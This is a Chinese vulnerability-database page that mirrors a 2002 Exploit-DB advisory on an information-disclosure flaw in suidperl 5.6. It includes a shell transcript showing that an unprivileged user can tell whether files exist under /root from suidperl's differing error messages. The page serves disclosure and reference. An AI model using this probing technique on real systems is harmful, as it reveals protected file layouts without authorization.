SUIDPerl 5.6 – Information Disclosure

SUIDPerl 5.6 – Information Disclosure

漏洞ID 1053651 漏洞类型
发布时间 2002-11-29 更新时间 2002-11-29
图片[1]-SUIDPerl 5.6 – Information Disclosure-安全小百科CVE编号 N/A
图片[2]-SUIDPerl 5.6 – Information Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22055
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6282/info

An information disclosure vulnerability has been reported for SuidPerl. Reportedly, it is possible for an attacker to determine whether files exist in non-accessible directories.

An attacker can exploit this vulnerability by invoking suidperl with an absolute filename to determine whether the file exists. When run in this manner, suidperl will return with a message that confirms the existence of a file.

bash-2.04$ ls -ald /root
drwxr-x--- 66 root root 8192 Nov 29 16:00 /root
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ls /root/.bashrc
ls: /root/.bashrc: Permission denied
bash-2.04$ suidperl /root/.bashrc
Script is not setuid/setgid in suidperl
bash-2.04$ suidperl /root/nonexistantfile
Can't open perl script "/root/nonexistantfile": No such file or directory

相关推荐: Netscape CommunicatorNetscape Mail Notification 信息泄漏漏洞

Netscape CommunicatorNetscape Mail Notification 信息泄漏漏洞 漏洞ID 1206674 漏洞类型 未知 发布时间 2000-01-12 更新时间 2000-01-12 CVE编号 CVE-2000-0087 CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享